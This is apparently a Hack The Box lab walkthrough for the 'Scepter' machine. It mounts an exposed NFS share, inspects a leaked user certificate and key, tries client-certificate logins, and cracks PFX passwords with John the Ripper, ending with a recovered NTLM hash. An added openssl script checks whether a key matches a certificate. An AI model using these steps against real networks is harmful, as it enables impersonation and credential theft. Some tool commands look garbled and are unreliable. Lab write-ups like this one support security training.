Enumeration

10.10.11.65
sudo nmap -sC -sV -oA scepter 10.10.11.65
  • The nmap scan shows an NFS share is exported
showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)
mkdir helpdesk
sudo mount -t nfs -o vers=3,nolock 10.10.11.65:/helpdesk ./helpdesk

Mounted NFS Share

The share contains baker.crt and baker.key, plus .pfx files for clark, lewis and scott.

openssl x509 -in baker.crt -text -noout

Key Findings from baker.crt

User Identity

  • Common Name (CN): d.baker

  • Email Address: d.baker@scepter.htb

  • UPN (User Principal Name): d.baker@scepter.htb

  • SID: S-1-5-21-74879546-916818434-740295365-1106 (the identifier Windows authentication uses for this account)

πŸ›οΈ Domain Info

  • Domain: scepter.htb

  • CA: scepter-DC01-CA, an internal CA on the domain controller (probably AD CS)

Certificate Usage

  • Key Usage: Digital Signature, Key Encipherment

  • Extended Key Usage:

    • Client Authentication

    • EFS (Microsoft Encrypting File System)

    • Email Protection

This cert is meant for client TLS authentication, possibly used for smartcard logon or mutual TLS on internal web portals, VPNs, RDP or WinRM.


🎯 Next Steps

1. Check for Matching Private Key

Since you have baker.key, try pairing it with the cert:

openssl x509 -noout -modulus -in baker.crt | openssl md5
openssl rsa -noout -modulus -in baker.key | openssl md5

If the two hashes match, the cert and key are a valid pair and the user can be impersonated.

You can now:

  • Use curl, openssl, or impacket tools with this client certificate

  • Possibly authenticate to internal HTTPS services or Active Directory (via LDAP/TLS, WinRM, etc.)
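As an added example (not from the original write-up), the pairing check from step 1 done by comparing the public key material directly rather than hashing the modulus, which also covers EC keys where there is no RSA modulus at all. It assumes openssl 1.1.1 or later and builds its own throwaway keys and certs; nothing here comes from the share.

```shell
#!/bin/sh
# Added example, not part of the original write-up: confirm that a private key
# belongs to a certificate by comparing the public keys they carry. Unlike the
# md5-of-modulus trick, this works for RSA and EC keys alike. Assumes openssl
# (1.1.1 or later) is installed; all key and cert files are constructed here.
set -e

# cert_matches_key CERT KEY: succeeds only when KEY is the private key for CERT.
cert_matches_key() {
    cert_pub=$(openssl x509 -in "$1" -noout -pubkey)   # SubjectPublicKeyInfo from the cert
    key_pub=$(openssl pkey -in "$2" -pubout)           # public half derived from the key
    [ -n "$cert_pub" ] && [ "$cert_pub" = "$key_pub" ]
}

# cert_san CERT: print the Subject Alternative Name extension, where an AD CS
# client certificate carries the e-mail address and UPN of the account.
cert_san() {
    openssl x509 -in "$1" -noout -ext subjectAltName
}

# Constructed test material in a temporary directory (removed on exit).
workdir=$(mktemp -d)
trap 'rm -rf "$workdir"' EXIT

# An RSA key with its self-signed cert, plus an unrelated RSA key.
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out "$workdir/rsa.key" 2>/dev/null
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out "$workdir/other.key" 2>/dev/null
openssl req -new -x509 -key "$workdir/rsa.key" -days 1 -subj "/CN=example.user" \
    -addext "subjectAltName=email:example.user@example.test" -out "$workdir/rsa.crt" 2>/dev/null

# An EC pair: here there is no RSA modulus to hash, but the public-key check still works.
openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:P-256 -out "$workdir/ec.key" 2>/dev/null
openssl req -new -x509 -key "$workdir/ec.key" -days 1 -subj "/CN=ec.user" -out "$workdir/ec.crt" 2>/dev/null

for pair in "rsa.crt rsa.key" "rsa.crt other.key" "ec.crt ec.key"; do
    set -- $pair
    if cert_matches_key "$workdir/$1" "$workdir/$2"; then
        echo "$1 and $2: MATCH"
    else
        echo "$1 and $2: no match"
    fi
done
cert_san "$workdir/rsa.crt"
```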


2. Hunt for HTTPS with Client Auth

From your Nmap files, grep for HTTPS services:

grep -i 'https\|ssl' scepter.nmap

Try connecting:

curl -v --cert baker.crt --key baker.key https://<target>

Or test mutual TLS with openssl:

openssl s_client -connect <target>:443 -cert baker.crt -key baker.key

If you see "Verify return code: 0 (ok)" or get a 200/302 response, you're authenticated.


3. Try Certificate-Based Auth for Impacket Tools

If baker.key + baker.crt are valid and you find SMB, LDAP, or WinRM:

# With LDAP
ldapsearch -H ldaps://<target> -D "d.baker@scepter.htb" -w '' -E pr=1000/noprompt -b "DC=scepter,DC=htb"
 
# Or with Impacket (if certauth supported)
python3 certi.py auth -pfx cert.pfx -target scepter.htb

Or emulate a smartcard login with modified tools (like PKINITtools or Impacket+Certauth patch).


4. Crack PFX Files

To potentially expand your access:

pfx2john scott.pfx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

These may also contain valid certs and keys, like the d.baker pair.


🧠 Summary

Finding                          Value
Cert for d.baker@scepter.htb     Real domain user
Private key in baker.key         Can likely impersonate user
Cert is valid until Nov 2025     Not expired
TLS client auth enabled          Can be used for services like HTTPS, WinRM, LDAP

python3 /opt/JohnTheRipper/run/pfx2john.py lewis.pfx | tee -a lewis

Do this for all three .pfx files.

Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce